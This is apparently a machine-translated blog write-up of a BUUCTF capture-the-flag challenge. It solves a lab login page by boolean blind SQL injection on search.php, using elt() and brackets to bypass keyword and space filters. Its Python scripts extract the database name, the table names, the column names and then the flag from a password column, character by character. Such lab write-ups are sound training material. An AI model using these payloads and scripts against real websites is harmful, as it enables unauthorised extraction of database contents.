Welcome to my WeChat official account, the soul of the shell.
Environmental Science: BUUCTF online evaluation (buuoj.cn)
Similar to the previous target aircraft, it is also a login box, but there are several more buttons, and the marked bureau also reminds that it is through sql blind injection
![](/images/doc/58de6dba80c67364ef4574e6c3edeaff.jpg)
Do a simple fuzz y to the login box
You can see that the brackets are filtered, so the error injection is useless
![](/images/doc/42591b5fb34b0afb3cfe04ed9b348f65.jpg)
However, there is more than one point that can be injected. Click the button on the home page to find a digital injection. You can try blind injection
Do some fuzz y
Only a few keywords are filtered, far less than the injection point just now, but the if function is filtered and can be replaced by elt
![](/images/doc/52671473bd303057a82189144d60b7f2.jpg)
![](/images/doc/e95f5907553edbac8d25baf825c1d449.jpg)
First, judge whether it can be used
/search.php?id=elt(length(database())>1,6)
![](/images/doc/38202382bbddda614692155b1bcb1cf0.jpg)
After determining that the elt function can be used for blind injection, the next step is to enter the blind injection stage
Because this injection point filters out spaces, I use () to bypass the filter. A big problem with using () to bypass the filter is that it will make the statements very messy, so I will test the statements locally and segment them. After confirming that the statements are available, I will run them on the target
Before writing a script, we should first obtain the judgment rules of blind note, and first determine the difference between correct statement and wrong statement
Correct execution
![](/images/doc/cfc8a59bbde211d76c9fd57faaa73e88.jpg)
Error execution
![](/images/doc/7f37a43903cb92e8b5b1b7ce83aab455.jpg)
syntax error
![](/images/doc/4085f8f202c870ce7436e3030368ce2b.jpg)
First, get the length of the database
You can see that the length is 4
![](/images/doc/c96ff13db2069cf84955a0da1a9c51ce.jpg)
Then judge the name of the database and use the python script. Since buuctf's server adds a 200 status code, you can understand everything you know
import requests q = [] # Add numbers to the list for x in range(0, 10): q.append(x) # Add lowercase letters and commas to the list for x in range(ord("a"), ord("z")+1): q.append(chr(x)) q.append(",") # print(q) for i in range(1, 5): for s in q: url = "http://cb93c4a8-bc95-43db-be46-28be43869ea1.node4.buuoj.cn:81/search.php?id=" url = url + "elt(substr((select(database())),%d,1)='%s',6)" % (i, s) r = requests.get(url) if(("ERROR!!!" not in r.text) and (r.status_code == 200)): print(url) break # print(url)
See that the database name is geek
![](/images/doc/6a1c73294a4204a40a2d92560ff1b6b8.jpg)
Then judge the table name
import requests q = [] # Add numbers to the list for x in range(0, 10): q.append(x) # Add lowercase letters and commas to the list for x in range(ord("a"), ord("z")+1): q.append(chr(x)) q.append(",") # print(q) for i in range(1, 17): for s in q: url = "http://cb93c4a8-bc95-43db-be46-28be43869ea1.node4.buuoj.cn:81/search.php?id=" # elt(substr((select group_concat(table_name) from information_schema.tables where table_schema='geek'),1,1)='e',6) url = url + "elt(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),%d,1)='%s',6)" % (i, s) r = requests.get(url) if(("ERROR!!!" not in r.text) and (r.status_code == 200)): print(url) break # print(url)
![](/images/doc/349044d7f80baf5cc59bd2eed48fb1bd.jpg)
I have encountered a strange problem in exploding the field name. I don't know why. When exploding the table name, it can respond correctly regardless of case, but when exploding the field, it needs to be case sensitive. The field name I entered at the beginning is f1nal1y, but it can't be exploded. It needs to be replaced with F1naI1y
import requests q = [] # Add numbers to the list for x in range(0, 10): q.append(x) # Add lowercase letters and commas to the list for x in range(ord("a"), ord("z")+1): q.append(chr(x)) q.append(",") # print(q) for i in range(17, 21): for s in q: url = "http://cb93c4a8-bc95-43db-be46-28be43869ea1.node4.buuoj.cn:81/search.php?id=" # elt(substr((select group_concat(table_name) from information_schema.tables where table_schema='geek'),1,1)='e',6) url = url + "elt(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1)='%s',6)" % (i, s) r = requests.get(url) if(("ERROR!!!" not in r.text) and (r.status_code == 200)): print(url) break # print(url)
![](/images/doc/dac96e87acca6eaaebc603d05b1e6d8f.jpg)
flag is finally hidden in the password field, and this value is still very long, which takes a long time
import requests q = [] # Add numbers to the list for x in range(0, 10): q.append(x) # Add lowercase letters, commas, -, {} to the list for x in range(ord("a"), ord("z")+1): q.append(chr(x)) q.append(",") q.append("_") q.append("-") q.append("{") q.append("}") # print(q) for i in range(1, 230): for s in q: url = "http://cb93c4a8-bc95-43db-be46-28be43869ea1.node4.buuoj.cn:81/search.php?id=" # elt(substr((select group_concat(table_name) from information_schema.tables where table_schema='geek'),1,1)='e',6) url = url + "elt(substr((select(group_concat(password))from(F1naI1y)),%d,1)='%s',6)" % (i, s) r = requests.get(url) if(("ERROR!!!" not in r.text) and (r.status_code == 200)): print(s, end="") break # print(url)
![](/images/doc/86239f410ec7b72be916ccaba614a47f.jpg)
(as a result, he ran again because of the target mechanism)